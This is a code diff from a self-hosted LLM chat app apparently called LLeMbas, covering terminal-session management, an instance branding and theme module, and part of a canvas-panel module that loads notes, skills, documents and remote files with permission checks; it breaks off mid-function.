# the usual one. Say so rather than leaving the buttons greyed.
self.integration = INTEGRATION_NONE
def _remember(self, data: bytes) -> None:
self._scrollback.append(data)
self._scrollback_bytes += len(data)
while self._scrollback_bytes > SCROLLBACK_BYTES and len(self._scrollback) > 1:
self._scrollback_bytes -= len(self._scrollback.popleft())
def announce(self, text: str) -> None:
"""Put one text frame in front of every viewer.
Through the same queues as the output so ordering is preserved: a
"finished" that overtook the last of the output it describes would have
a panel offering a capture the screen has not caught up with. Dropped
rather than blocking on a full queue -- that viewer is already being
disconnected and will be told again on reattach.
"""
for viewer in list(self.viewers.values()):
with contextlib.suppress(asyncio.QueueFull):
viewer.queue.put_nowait(text)
def _fan_out(self, data: bytes) -> None:
for viewer in list(self.viewers.values()):
try:
viewer.queue.put_nowait(data)
except asyncio.QueueFull:
# Emptied first so the sentinel fits and so the socket does not
# spend its last moments writing frames nobody will see.
_drain(viewer.queue)
viewer.dropped = True
with contextlib.suppress(asyncio.QueueFull):
viewer.queue.put_nowait(None)
self.viewers.pop(viewer.id, None)
# --- Closing -------------------------------------------------------------
async def close(self, reason: str = CLOSED_SHUTDOWN) -> None:
pump, self._pump = self._pump, None
if pump is not None:
pump.cancel()
with contextlib.suppress(asyncio.CancelledError, Exception):
await pump
await self._finish(reason)
async def _finish(self, reason: str) -> None:
"""Mark this session over and wake everybody watching.
Called from the pump when the shell exits, and from `close` after the
pump has been cancelled -- which is why it does not cancel the pump
itself. The entry stays in the registry for KEEP_CLOSED so a late
attachment gets an explanation.
"""
if self.closed:
return
self.closed = True
self.closed_reason = reason
self.closed_at = time.monotonic()
for viewer in list(self.viewers.values()):
with contextlib.suppress(asyncio.QueueFull):
viewer.queue.put_nowait(None)
await self._teardown()
log.info(
"terminal closed chat=%s owner=%s profile=%s reason=%s after=%.0fs",
self.chat_id,
self.owner_id,
self.profile_id,
reason,
time.monotonic() - self.started_at,
)
async def _teardown(self) -> None:
process, self._process = self._process, None
conn, self._conn = self._conn, None
if process is not None:
with contextlib.suppress(Exception):
process.terminate()
if conn is not None:
with contextlib.suppress(Exception):
conn.close()
with contextlib.suppress(Exception):
await conn.wait_closed()
@property
def idle_for(self) -> float:
if self.viewers:
return 0.0
return time.monotonic() - self.last_active
# --- The registry ------------------------------------------------------------
_SESSIONS: dict[str, Session] = {}
_REAPER: asyncio.Task | None = None
def get(chat_id: str) -> Session | None:
"""The live session for a chat, if there is one. Closed ones do not count."""
session = _SESSIONS.get(chat_id)
if session is None or session.closed:
return None
return session
def peek(chat_id: str) -> Session | None:
"""As `get`, but a recently closed session too -- it carries the reason."""
return _SESSIONS.get(chat_id)
def count() -> int:
return sum(1 for s in _SESSIONS.values() if not s.closed)
def count_for(owner_id: str) -> int:
return sum(1 for s in _SESSIONS.values() if not s.closed and s.owner_id == owner_id)
async def open_session(
chat_id: str,
*,
owner_id: str,
profile_id: str,
label: str,
spec: dict[str, Any],
project_dir: str = "",
idle_timeout: float = 1800.0,
max_sessions: int = 20,
max_per_user: int = 3,
cols: int = 80,
rows: int = 24,
integrate: bool = True,
) -> Session:
"""The shell for this chat, opening one if it is not already there.
Idempotent for the same reason `generation.ensure` is: a second tab, or the
same tab after a reload, must attach to what is running rather than start a
second shell on the same machine.
"""
existing = get(chat_id)
if existing is not None:
return existing
_reap()
if count() >= max_sessions:
raise ExecError(
"This instance already has as many terminals open as it allows. "
"Close one, or ask an administrator to raise the limit."
)
if count_for(owner_id) >= max_per_user:
raise ExecError(
f"You already have {max_per_user} terminal"
f"{'' if max_per_user == 1 else 's'} open. Close one first."
)
session = Session(
chat_id,
owner_id=owner_id,
profile_id=profile_id,
label=label,
integrate=integrate,
project_dir=project_dir,
idle_timeout=idle_timeout,
cols=cols,
rows=rows,
)
await session.start(spec)
_SESSIONS[chat_id] = session
_ensure_reaper()
log.info(
"terminal opened chat=%s owner=%s profile=%s host=%s dir=%s",
chat_id,
owner_id,
profile_id,
label,
project_dir or "~",
)
return session
async def close_chat(chat_id: str, reason: str = CLOSED_REVOKED) -> bool:
session = _SESSIONS.pop(chat_id, None)
if session is None:
return False
await session.close(reason)
return True
def rekey(old: str, new: str) -> Session | None:
"""Move a live session from one id to another, keeping the shell.
What adoption is made of: a shell opened on the new-chat screen under a
draft id becomes the shell of the chat that screen turned into, with its
scrollback and whatever is half-typed at its prompt. Nothing reconnects --
the browser navigates after `start_chat` and attaches to the session now
living under the real id, which is the "a reload is indistinguishable from a
second tab" property working for us rather than against us.
**Both the key and the field.** `close_for_profile`, `close_for_owner` and
the reaper all pop by `session.chat_id` rather than by the key they found it
under, so a stale field would leave a closed session in the registry that
`get` keeps handing out and `count_for` keeps counting.
"""
session = _SESSIONS.pop(old, None)
if session is None:
return None
session.chat_id = new
_SESSIONS[new] = session
log.info("terminal adopted %s -> %s", old, new)
return session
async def close_for_profile(profile_id: str) -> int:
"""End every shell opened on one connection.
`session.profile_for` re-checks the profile on every reply, so deleting or
disabling one stops the model at once. A terminal resolves the profile
when it opens and then holds the connection, so without this "I disabled
that connection" would simply not be true of the shell already on screen.
"""
doomed = [s for s in _SESSIONS.values() if s.profile_id == profile_id and not s.closed]
for session in doomed:
_SESSIONS.pop(session.chat_id, None)
await session.close(CLOSED_REVOKED)
return len(doomed)
async def close_for_owner(owner_id: str) -> int:
doomed = [s for s in _SESSIONS.values() if s.owner_id == owner_id and not s.closed]
for session in doomed:
_SESSIONS.pop(session.chat_id, None)
await session.close(CLOSED_REVOKED)
return len(doomed)
async def shutdown() -> None:
"""End every shell. Called from the lifespan, beside stop_generations."""
global _REAPER
reaper, _REAPER = _REAPER, None
if reaper is not None:
reaper.cancel()
with contextlib.suppress(asyncio.CancelledError, Exception):
await reaper
for session in list(_SESSIONS.values()):
await session.close(CLOSED_SHUTDOWN)
_SESSIONS.clear()
def _reap() -> None:
"""Drop sessions that have been closed long enough to stop explaining."""
now = time.monotonic()
for chat_id, session in list(_SESSIONS.items()):
if session.closed and now - session.closed_at > KEEP_CLOSED:
_SESSIONS.pop(chat_id, None)
def _ensure_reaper() -> None:
global _REAPER
if _REAPER is None or _REAPER.done():
_REAPER = asyncio.create_task(_reaper_loop())
async def _reaper_loop() -> None:
"""Close idle shells, then forget closed ones.
A task rather than a sweep inside `open_session`, which is the shape
`generation` uses. That works there because a generation ends on its own and
something calls in again; a shell at a prompt does neither, so a lazy sweep
would run only when somebody opened the *next* terminal.
"""
while True:
try:
await asyncio.sleep(REAP_INTERVAL)
for session in list(_SESSIONS.values()):
if not session.closed and session.idle_for > session.idle_timeout:
_SESSIONS.pop(session.chat_id, None)
await session.close(CLOSED_IDLE)
_reap()
except asyncio.CancelledError:
raise
except Exception: # noqa: BLE001 - the reaper must outlive one bad sweep
log.exception("the terminal reaper raised")
def _drain(queue: asyncio.Queue) -> None:
while True:
try:
queue.get_nowait()
except asyncio.QueueEmpty:
return
def _clamp(value: int, low: int, high: int) -> int:
try:
number = int(value)
except (TypeError, ValueError):
return low
return min(max(number, low), high)
__all__ = [
"CLOSED_EXITED",
"CLOSED_IDLE",
"CLOSED_REVOKED",
"CLOSED_SHUTDOWN",
"Session",
"Viewer",
"close_chat",
"close_for_owner",
"close_for_profile",
"count",
"count_for",
"get",
"open_session",
"peek",
"shutdown",
]
File diff suppressed because it is too large Load Diff
-506
View File
@@ -1,506 +0,0 @@
"""What this installation is called, and what it looks like.
An instance can be somebody else's. That means four separate things, and they
are separate because they fail differently:
- an **identity** a name, a tagline, a logo, a favicon, the icons a launcher
shows;
- **flavour text** the Middle-earth lines, which live in the artwork, the
empty states, the loading lines and the error pages and nowhere else (see the
flavour rule in the working notes), and which somebody rebranding needs to be able to
replace without editing templates;
- **themes**, which are token sets rather than stylesheets, because the
invariant that no component hard-codes a colour is what makes a third one
compose at all;
- **arbitrary CSS**, for the things the first three do not reach.
## Defaults in code, overrides in the database
The prompt-fragment rule, applied again and for the same reason: text equal to
its default is never stored, so a later release improving a default still
reaches an instance whose administrator once pressed Save. `stored_only` is what
enforces it, and every save goes through it.
## Why a snapshot, and why a Jinja global
`web/templating.py:render()` has no database session, and the login page, the
error pages, the offline page and the SSE path do not go through it at all. A
context value would therefore have to be threaded through every one of those,
and the ones that bypass `render()` could not be reached at all.
So this is a **process-level cache** behind a lazy proxy registered as a Jinja
global. One query per process, and after every save; every render path gets it
including the ones that never see a `Request`. `forget()` is called by the admin
page and by nothing else.
The cost of being a cache is stated rather than discovered: with several
workers, a save in one is not seen by the others until each next reads. That is
already true of this application for other reasons -- see the "one worker" note
in the roadmap -- and this does not make it worse.
"""
from __future__ import annotations
import hashlib
import logging
import re
from dataclasses import dataclass, field
from typing import Any
from lembas.services import settings_store
log = logging.getLogger(__name__)
BRANDING = settings_store.BRANDING
DEFAULT_NAME = "LLeMbas"
# --- Flavour ------------------------------------------------------------------
# Every Middle-earth string in the interface, with its current wording as the
# default. Keyed rather than positional so a template names what it wants, and
# a key nobody has overridden costs nothing to store.
#
# The label is what the admin page calls the field; the hint says where it is
# seen, because a string with no context is one nobody can safely rewrite.
FLAVOUR: dict[str, tuple[str, str, str]] = {
"login_tagline": (
"Under the sign-in mark",
"The one line on the sign-in page, beneath the name.",
"Waybread for the long road of thought.",
),
"chat_empty": (
"Empty chat",
"Above the composer on a chat with nothing in it yet.",
"Speak, friend, and enter.",
),
"offline_title": (
"Offline heading",
"The page the service worker shows when the server cannot be reached.",
"No road from here",
),
"offline_line": (
"Offline line",
"Beneath that heading. The sentence below it is functional and is not "
"editable here.",
"The Road goes ever on and on — but not without a connection.",
),
"error_403": (
"403 — not yours",
"Shown on a page somebody is not allowed to see.",
"Speak, friend, and enter. This door is not yours to open.",
),
"error_404": (
"404 — not found",
"Shown on a page that does not exist.",
"Not all those who wander are lost. This page, however, is.",
),
"error_500": (
"500 — something broke",
"Shown when something went wrong on the server.",
"The Road goes ever on, but this stretch of it has washed out.",
),
"theme_moria": (
"Dark theme name",
"What the built-in dark theme is called, in the settings screen and in "
"the /theme command.",
"Moria",
),
"theme_shire": (
"Light theme name",
"What the built-in light theme is called.",
"Shire",
),
}
# --- Themes -------------------------------------------------------------------
# The two built-ins. `css` is empty for both: their tokens are declared in
# tokens.css, which is the one place colours live, and duplicating them here so
# that a custom theme could "inherit" would be exactly the second copy that
# rule exists to prevent. A custom theme inherits by naming a base instead --
# see `theme_css` below.
SCHEME_DARK = "dark"
SCHEME_LIGHT = "light"
BUILT_IN = (
("moria", SCHEME_DARK, "#101317"),
("shire", SCHEME_LIGHT, "#F6F1E4"),
)
# What a custom theme may set. A curated handful rather than every token a
# theme block declares: sixty colour pickers is not a feature, and everything
# left out inherits from the base, which is what makes a theme that changes
# four things four things long.
#
# `--accent-soft`, `--leaf-soft` and `--danger-soft` are deliberately absent and
# are derived instead: they are the same colour at 14% and an administrator who
# changed the accent without them would get focus rings in the old hue, which
# looks like the setting half-working.
THEME_TOKENS: tuple[tuple[str, str], ...] = (
("bg", "Page background"),
("bg-sunken", "Behind the page — the sidebar and panel gutters"),
("surface", "Cards, menus and the composer"),
("surface-raised", "Anything sitting on a surface"),
("surface-hover", "A surface under the pointer"),
("border", "Ordinary borders"),
("border-strong", "Borders that have to be seen"),
("ink", "Body text"),
("ink-muted", "Secondary text"),
("ink-faint", "Hints and timestamps"),
("accent", "Links, focus and interactive accents"),
("accent-hover", "The accent under the pointer"),
("accent-ink", "Text on top of the accent"),
("leaf", "The brand accent and the assistant's mark"),
("danger", "Errors and destructive actions"),
("success", "Confirmations and unread dots"),
("warning", "Warnings"),
("bubble-user", "Behind your own messages"),
("code-bg", "Behind code"),
)
THEME_TOKEN_NAMES = tuple(name for name, _ in THEME_TOKENS)
# A colour, and nothing else. Values reach a stylesheet, so a `}` in one would
# end the rule and silently break every rule after it -- and `url(…)` in a
# colour slot is a request to a third party from every page. Anything that does
# not match is dropped rather than corrected: a colour nobody can read is a
# setting that did not take, and that is visible, while a mangled one is not.
_COLOUR = re.compile(
r"^(#[0-9a-fA-F]{3,8}"
r"|rgba?\([0-9,.\s%/]+\)"
r"|hsla?\([0-9,.\s%/deg]+\)"
r"|[a-z]{3,20})$"
)
# An id that can be an attribute value and a CSS selector without quoting.
_THEME_ID = re.compile(r"^[a-z][a-z0-9-]{0,23}$")
@dataclass(frozen=True)
class Theme:
"""One theme somebody can choose."""
id: str
label: str
scheme: str
# Which built-in it starts from. A custom theme sets a handful of tokens and
# inherits the rest, and that inheritance is a CSS fact: tokens.css matches
# `[data-base="shire"]` as well as `[data-theme="shire"]`, so a custom light
# theme carries `data-base="shire"` and gets the whole parchment palette
# underneath its own four colours. Without it a light custom theme would be
# four light colours on Moria's near-black surfaces.
base: str = "moria"
tokens: dict[str, str] = field(default_factory=dict)
colour: str = ""
built_in: bool = False
@dataclass(frozen=True)
class Branding:
"""Everything a page needs to know about whose instance this is."""
name: str = DEFAULT_NAME
tagline: str = ""
logo_path: str = ""
favicon_path: str = ""
icon_paths: dict[str, str] = field(default_factory=dict)
custom_css: str = ""
text: dict[str, str] = field(default_factory=dict)
themes: tuple[Theme, ...] = ()
@property
def theme_ids(self) -> tuple[str, ...]:
return tuple(theme.id for theme in self.themes)
@property
def theme_list(self) -> str:
"""`id:base` pairs, space separated, for the `data-themes` attribute.
One attribute rather than a JSON island, because two things in the
browser need it `/theme` validating a name, and `applyTheme` setting
`data-base` alongside `data-theme` and both want a list they can split
rather than a document they have to parse.
"""
return " ".join(f"{theme.id}:{theme.base}" for theme in self.themes)
def theme(self, theme_id: str) -> Theme:
for theme in self.themes:
if theme.id == theme_id:
return theme
return self.themes[0]
@property
def revision(self) -> str:
"""A short hash of everything `/branding.css` is built from.
It goes in that link's query string, so the URL changes exactly when the
stylesheet does. Without it the browser's cache is the thing deciding
when a rebrand takes effect, which is the failure this codebase keeps
cataloguing: a save that looks like it worked and did nothing.
"""
material = repr((self.custom_css, [(t.id, t.base, sorted(t.tokens.items())) for t in
self.themes]))
return hashlib.sha256(material.encode("utf-8")).hexdigest()[:12]
# --- Reading ------------------------------------------------------------------
def defaults() -> dict[str, Any]:
return {
"instance_name": "",
"tagline": "",
"logo_path": "",
"favicon_path": "",
# Derived from the logo at save time, so a launcher gets real PNGs at
# the sizes it asks for rather than one image the browser is told to
# scale. Empty means the shipped artwork is used.
"icon_paths": {},
"custom_css": "",
"themes": [],
**{f"text_{key}": "" for key in FLAVOUR},
}
def _theme_from(raw: dict[str, Any]) -> Theme | None:
"""One stored custom theme, or None if it is not usable.
Every field is validated on read rather than trusted from the row: a theme
stored by an earlier version, or written straight into the settings table,
still has to produce a stylesheet that parses.
"""
theme_id = str(raw.get("id") or "").strip().lower()
if not _THEME_ID.match(theme_id) or theme_id in {name for name, _, _ in BUILT_IN}:
return None
base = str(raw.get("base") or "moria")
if base not in {name for name, _, _ in BUILT_IN}:
base = "moria"
tokens = {
name: value
for name, value in (raw.get("tokens") or {}).items()
if name in THEME_TOKEN_NAMES and _COLOUR.match(str(value).strip())
}
scheme = next(s for name, s, _ in BUILT_IN if name == base)
return Theme(
id=theme_id,
label=str(raw.get("label") or theme_id).strip()[:60] or theme_id,
scheme=scheme,
base=base,
tokens=tokens,
colour=tokens.get("bg", ""),
)
def build(values: dict[str, Any]) -> Branding:
"""A snapshot from a settings group. Pure, so it can be tested without a
database and used by the preview on the admin page."""
text = {
key: str(values.get(f"text_{key}") or "").strip() or default
for key, (_, _, default) in FLAVOUR.items()
}
themes = [
Theme(
id=theme_id,
label=text[f"theme_{theme_id}"],
scheme=scheme,
base=theme_id,
colour=colour,
built_in=True,
)
for theme_id, scheme, colour in BUILT_IN
]
seen = {theme.id for theme in themes}
for raw in values.get("themes") or []:
if not isinstance(raw, dict):
continue
theme = _theme_from(raw)
if theme is not None and theme.id not in seen:
seen.add(theme.id)
themes.append(theme)
return Branding(
name=str(values.get("instance_name") or "").strip() or DEFAULT_NAME,
tagline=str(values.get("tagline") or "").strip(),
logo_path=str(values.get("logo_path") or ""),
favicon_path=str(values.get("favicon_path") or ""),
icon_paths=dict(values.get("icon_paths") or {}),
custom_css=str(values.get("custom_css") or ""),
text=text,
themes=tuple(themes),
)
_CACHE: Branding | None = None
def snapshot() -> Branding:
"""The current branding, from a process-level cache.
Never raises. An error page that cannot render because branding could not be
read is a failure that hides the failure it was about to report, so a
database that is not there yet answers with the defaults.
"""
global _CACHE
if _CACHE is not None:
return _CACHE
try:
from lembas.db.session import session_scope
with session_scope() as db:
_CACHE = _read(db)
except Exception: # noqa: BLE001 - defaults are a usable answer, an exception is not
log.debug("could not read branding; using defaults", exc_info=True)
return build(defaults())
return _CACHE
def _read(db) -> Branding:
"""The two groups this is assembled from.
`instance_name` lived in the general group before there was a branding one,
and an upgrade must not quietly rename somebody's instance back to LLeMbas.
So the stored general value is a **seed**, and the test for it is whether the
branding row has said anything about the name at all -- `key in row`, not
`row[key] is truthy`. An empty stored name is somebody clearing the box,
which has to mean the default; a *missing* one is an instance that has never
seen this page. Reading the two the same way would resurrect the old name
underneath a cleared one, which is the failure a cleared reasoning effort
already documents.
That is why this reads the raw row rather than `get_group`, which fills in
defaults and so cannot tell absent from empty.
"""
from lembas.db.models import Setting
values = settings_store.get_group(db, BRANDING)
row = db.get(Setting, BRANDING)
said = isinstance(row, Setting) and isinstance(row.value, dict) and "instance_name" in row.value
if not said:
legacy = settings_store.get_group(db, settings_store.GENERAL).get("instance_name")
if legacy:
values = {**values, "instance_name": legacy}
return build(values)
def forget() -> None:
"""Drop the cache. Called by the admin page's save, and by tests."""
global _CACHE
_CACHE = None
def for_db(db) -> Branding:
"""The snapshot, seeded from a session the caller already has open.
Same value as `snapshot()`; this only spares the extra session on the first
render after a restart, where one is already in hand.
"""
global _CACHE
if _CACHE is None:
_CACHE = _read(db)
return _CACHE
# --- Writing ------------------------------------------------------------------
def stored_only(values: dict[str, Any]) -> dict[str, Any]:
"""Blank anything equal to its shipped wording, so it is not an override.
The prompt-fragment rule, and the reason it is a **blank rather than a
dropped key**: `settings_store.update` merges, so omitting a key leaves
whatever was stored last time. Dropping one would make "I typed the default
back in" and "I changed nothing" store different things, and make clearing a
box do nothing at all.
Empty is the not-overridden marker because `build` reads `stored or
default`. That is deliberately *not* the fragment convention, where an empty
override means the fragment is off: a fragment being off is a state somebody
wants, and a heading with no words is not.
"""
return {
key: ("" if _is_shipped(key, value) else value) for key, value in values.items()
}
def _is_shipped(key: str, value: Any) -> bool:
if key.startswith("text_"):
entry = FLAVOUR.get(key[len("text_") :])
return entry is not None and value == entry[2]
return value == defaults().get(key)
# --- The stylesheet -----------------------------------------------------------
def _soft(colour: str, alpha: str = "0.14") -> str:
"""A colour at low opacity, for the `*-soft` tokens.
Derived rather than asked for: they are the same colour at 14%, and an
administrator who set an accent without them would get focus rings and
selected states in the old hue -- which reads as the setting half-working
rather than as a field they missed.
Only hex is understood. Anything else answers "" and the base theme's own
soft value stands, which is the right failure: a wrong soft colour is worse
than an unchanged one.
"""
value = colour.strip()
if not value.startswith("#"):
return ""
digits = value[1:]
if len(digits) == 3:
digits = "".join(c * 2 for c in digits)
if len(digits) not in (6, 8):
return ""
try:
r, g, b = (int(digits[i : i + 2], 16) for i in (0, 2, 4))
except ValueError:
return ""
return f"rgba({r}, {g}, {b}, {alpha})"
def theme_css(theme: Theme) -> str:
"""One custom theme as a rule.
Two selectors' worth of work in one: the block sets what was chosen, and the
`data-base` attribute on <html> is what brings the rest of the base theme's
palette with it. Written here and served from `/branding.css`, which loads
after `tokens.css`, so these win on order at equal specificity.
"""
if not theme.tokens:
return ""
lines = [f" --{name}: {value};" for name, value in theme.tokens.items()]
for name, alpha in (("accent", "0.14"), ("leaf", "0.14"), ("danger", "0.14")):
soft = _soft(theme.tokens.get(name, ""), alpha)
if soft:
lines.append(f" --{name}-soft: {soft};")
return f':root[data-theme="{theme.id}"] {{\n' + "\n".join(lines) + "\n}\n"
def stylesheet(brand: Branding) -> str:
"""Everything `/branding.css` serves.
A route rather than an inline `<style>`, and that is a security property as
much as a caching one: an external stylesheet has no HTML context to escape
from, so an administrator's CSS cannot become markup however it is written.
Inline, the same text would be one `</style>` away from being a script.
"""
parts = [
"/* Generated by LLeMbas from the customization settings. */",
*(theme_css(theme) for theme in brand.themes if not theme.built_in),
]
if brand.custom_css.strip():
parts += ["/* Custom CSS. */", brand.custom_css.strip(), ""]
return "\n".join(part for part in parts if part)
__all__ = [
"BRANDING",
"BUILT_IN",
"DEFAULT_NAME",
"FLAVOUR",
"THEME_TOKENS",
"THEME_TOKEN_NAMES",
"Branding",
"Theme",
"build",
"defaults",
"for_db",
"forget",
"snapshot",
"stored_only",
"stylesheet",
"theme_css",
]
-480
View File
@@ -1,480 +0,0 @@
"""What is open in the canvas panel, and where its contents come from.
Six sources behind one shape. A tab key is `"<source>:<ref>"` and every source
answers the same two questions -- load this, and save that -- through one table.
A table rather than six branches for the reason `tool_labels.py` and
`sharing.RESOURCE_TYPES` are tables: six independently written permission checks
is how one of them ends up written slightly differently, and the way *that*
failure shows up is somebody editing somebody else's note.
The panel is a person's own hands. A save on an `agent:` tab therefore does not
go through `agent/policy.py`, exactly as the terminal panel and the directory
browser do not: whoever owns the credential could write the file with `scp`.
This is the first of those exceptions that *writes*, which is worth saying out
loud -- Manual mode's "everything is shown to you before it happens" is a promise
about the model, not about the interface.
"""
from __future__ import annotations
import posixpath
from dataclasses import dataclass
from datetime import UTC
from sqlalchemy.orm import Session as DBSession
from lembas.db.models import KIND_AGENT, Attachment, Chat, SshProfile, User
from lembas.security import permissions
from lembas.services import scratch as scratch_service
from lembas.services import settings_store, sharing
from lembas.services.agent import index as index_service
from lembas.services.agent import instructions as instructions_service
from lembas.services.agent import ssh as ssh_service
from lembas.services.agent.base import Conflict, ExecError, revision_of
from lembas.services.library import documents as documents_service
from lembas.services.library import notes as notes_service
from lembas.services.library import skills as skills_service
# How many tabs a chat keeps. A model in a long reply reads forty files, and an
# unbounded strip is a strip nobody can read -- and it would live on the chat
# row forever. Past this the oldest tab that is not in front is dropped.
MAX_TABS = 12
SOURCE_AGENT = "agent"
SOURCE_NOTE = "note"
SOURCE_SKILL = "skill"
SOURCE_DOC = "doc"
SOURCE_FILE = "file"
SOURCE_SCRATCH = "scratch"
class Refused(Exception):
"""This person may not have this, or it is not there any more.
One exception for every source, because the panel answers all of them the
same way: a fragment saying so, in the tab, rather than an error page
swapped into the middle of a chat.
"""
@dataclass(frozen=True)
class Doc:
"""One open file, whatever it actually is underneath."""
key: str
title: str
subtitle: str = ""
text: str = ""
# An opaque token saying which version this was read at, round-tripped
# through a hidden field so a save can refuse a file that moved underneath.
revision: str = ""
writable: bool = False
# A filename or close enough, for choosing a lexer.
language: str = ""
markdown: bool = False
truncated: bool = False
binary: bool = False
@property
def editable(self) -> bool:
"""Whether the box is offered at all.
Not the same as `writable`. Saving back the first 256KB of a larger file
is how the rest of it is deleted, and a binary file has nothing safe to
put in a textarea -- both open read-only however the permissions read.
"""
return self.writable and not self.truncated and not self.binary
def path_key(project_dir: str, path: str) -> str:
"""One name for one file, so `./a.py` and `a.py` open the same tab.
The same normalisation `agent/tools.py:_path_key` applies to the read-path
set, and lifted here so the two cannot disagree: a tab a model opened and a
tab a person opened have to be one tab, or the panel shows the same file
twice and only one of them is the one being saved.
"""
if not posixpath.isabs(path) and project_dir:
path = posixpath.join(project_dir, path)
return posixpath.normpath(path)
def split(key: str) -> tuple[str, str]:
"""`"agent:/srv/a:b.py"` -> `("agent", "/srv/a:b.py")`.
`partition`, not `split`: a path may contain a colon, and a key that lost
half its path would silently open the wrong file.
"""
source, _, ref = (key or "").partition(":")
return source, ref
# --- The tab strip ---------------------------------------------------------------
def tabs_of(chat: Chat) -> list[dict]:
return list((chat.canvas_json or {}).get("tabs") or [])
def active_of(chat: Chat) -> str:
return str((chat.canvas_json or {}).get("active") or "")
def open_tab(state: dict, tab: dict, *, activate: bool = True) -> dict:
"""Add a tab, and optionally bring it to the front. Mutates `state`.
Mutating rather than returning a copy because the generation loop folds
several of these into one snapshot within a round: two `file_read` calls
that each read the state and wrote it back would leave only the second.
That is the lost update `plan_update` documents, in a different place.
`activate=False` is what a *model* opening a tab does, and it is the whole
of how this feature avoids being infuriating. An agent reads forty files in
a long reply; if each one took the panel, somebody reading the third would
be dragged through the other thirty-seven, and anybody halfway through an
edit would lose it. So the model fills the strip and the person decides
what is in front. A tab they open themselves activates, because opening
something and not being shown it is the opposite failure.
"""
key = str(tab.get("key") or "")
if not key:
return state
tabs = [t for t in (state.get("tabs") or []) if t.get("key") != key]
tabs.append({
"key": key,
"title": str(tab.get("title") or key)[:120],
"source": str(tab.get("source") or split(key)[0]),
})
# Evict from the front, and never the tab in front or the one just opened.
# A model reading its way through a project must not close the file
# somebody is looking at.
keep = {key, str(state.get("active") or "")}
while len(tabs) > MAX_TABS:
victim = next((t for t in tabs if t["key"] not in keep), None)
if victim is None:
break
tabs.remove(victim)
state["tabs"] = tabs
if activate or not state.get("active"):
# Not activating an empty panel would leave tabs with nothing in front,
# which reads as a panel that failed to load.
state["active"] = key
return state
def close_tab(state: dict, key: str) -> dict:
tabs = [t for t in (state.get("tabs") or []) if t.get("key") != key]
state["tabs"] = tabs
if state.get("active") == key:
state["active"] = tabs[-1]["key"] if tabs else ""
return state
def merge(stored: dict | None, live: dict | None) -> dict:
"""Fold a reply's tabs into whatever the row says now.
A union rather than an overwrite. `_persist` is the single writer, and the
snapshot it holds was taken when the reply began -- so overwriting would
drop a tab the person opened by hand while the reply was running.
"""
state = {
"tabs": list((stored or {}).get("tabs") or []),
"active": (stored or {}).get("active") or "",
}
for tab in (live or {}).get("tabs") or []:
# Never activating: what the row says is in front is what the person
# last chose, and a reply that finishes ten minutes later must not move
# it. The reply's own `active` is deliberately not consulted.
open_tab(state, tab, activate=False)
return state
# --- Which sources this chat may reach ---------------------------------------------
def agent_ready(db: DBSession, user: User, chat: Chat | None) -> SshProfile | None:
"""The profile an `agent:` tab would use, or None.
Everything `_terminal_enabled` checks except `agent.terminal`. Reading and
writing project files is what `tools.agent` is named after, and somebody who
may have a model write a file may certainly write one themselves.
Re-derived on every request. The template flag of the same name is
decoration; this is the control.
"""
if chat is None or chat.kind != KIND_AGENT or not chat.ssh_profile_id:
return None
if not permissions.has(db, user, "tools.agent"):
return None
if not settings_store.agents(db).get("enabled"):
return None
if ssh_service.available() != "":
return None
profile = db.get(SshProfile, chat.ssh_profile_id)
if profile is None or profile.owner_id != user.id or not profile.enabled:
return None
if not profile.host_key:
return None
return profile
def _executor(db: DBSession, user: User, chat: Chat) -> ssh_service.SshExecutor:
profile = agent_ready(db, user, chat)
if profile is None:
raise Refused(
"This chat has no connection you can reach. Check the connection's "
"host key on the Connections page if it has not been accepted yet."
)
return ssh_service.SshExecutor(ssh_service.spec_from(profile), chat.project_dir)
# --- Loading ------------------------------------------------------------------------
async def _load_agent(db: DBSession, user: User, chat: Chat, ref: str) -> Doc:
executor = _executor(db, user, chat)
path = path_key(chat.project_dir, ref)
try:
found = await executor.read_text(path)
except ExecError as exc:
raise Refused(str(exc)) from exc
return Doc(
key=f"{SOURCE_AGENT}:{path}",
title=posixpath.basename(path) or path,
subtitle=path,
text=found.text,
revision=found.revision,
writable=True,
language=posixpath.basename(path),
markdown=path.lower().endswith((".md", ".markdown")),
truncated=found.truncated,
binary=found.binary,
)
async def _load_note(db: DBSession, user: User, chat: Chat, ref: str) -> Doc:
_needs_library(db, user)
note = notes_service.get(db, ref, user)
if note is None:
raise Refused("That note is not there any more.")
return Doc(
key=f"{SOURCE_NOTE}:{note.id}",
title=note.title or "Note",
subtitle="Note",
text=note.body or "",
revision=_stamp(note, note.body or ""),
writable=sharing.can_write(note, user),
language="note.md",
markdown=True,
)
async def _load_skill(db: DBSession, user: User, chat: Chat, ref: str) -> Doc:
_needs_library(db, user)
skill = skills_service.get(db, ref, user)
if skill is None:
raise Refused("That skill is not there any more.")
return Doc(
key=f"{SOURCE_SKILL}:{skill.id}",
title=skill.name or "Skill",
subtitle="Skill",
text=skill.body or "",
revision=_stamp(skill, skill.body or ""),
writable=sharing.can_write(skill, user),
language="skill.md",
markdown=True,
)
async def _load_doc(db: DBSession, user: User, chat: Chat, ref: str) -> Doc:
_needs_library(db, user)
document = documents_service.get(db, ref, user)
if document is None:
raise Refused("That document is not there any more.")
return Doc(
key=f"{SOURCE_DOC}:{document.id}",
title=document.title or document.filename or "Document",
subtitle="Knowledge document",
text=document.extracted_text or document.extraction_error or "",
revision=_stamp(document, document.extracted_text or ""),
writable=documents_service.can_write(document, user),
language=document.filename or "",
markdown=(document.filename or "").lower().endswith((".md", ".markdown")),
truncated=bool(document.truncated),
)
async def _load_file(db: DBSession, user: User, chat: Chat, ref: str) -> Doc:
attachment = db.get(Attachment, ref)
if attachment is None or attachment.user_id != user.id:
raise Refused("That attachment is not there any more.")
# Belonging to this conversation, so a canvas cannot browse another one's
# files by id. `chat_id` covers one still in the composer; the message check
# covers one that has been sent.
if attachment.chat_id != chat.id:
raise Refused("That attachment belongs to another chat.")
return Doc(
key=f"{SOURCE_FILE}:{attachment.id}",
title=attachment.filename or "Attachment",
subtitle=attachment.source_path or "Attachment",
text=attachment.extracted_text or attachment.extraction_error or "",
# Read-only, and not for want of a write path: `DELETE /api/files/{id}`
# already refuses once the attachment has been sent, because it would
# rewrite a message somebody already read. Editing is the same act with
# a quieter failure.
writable=False,
language=attachment.filename or "",
markdown=(attachment.filename or "").lower().endswith((".md", ".markdown")),
truncated=bool(attachment.truncated),
)
async def _load_scratch(db: DBSession, user: User, chat: Chat, ref: str) -> Doc:
if ref != chat.id:
raise Refused("That scratch document belongs to another chat.")
doc = scratch_service.for_chat(db, chat)
return Doc(
key=f"{SOURCE_SCRATCH}:{chat.id}",
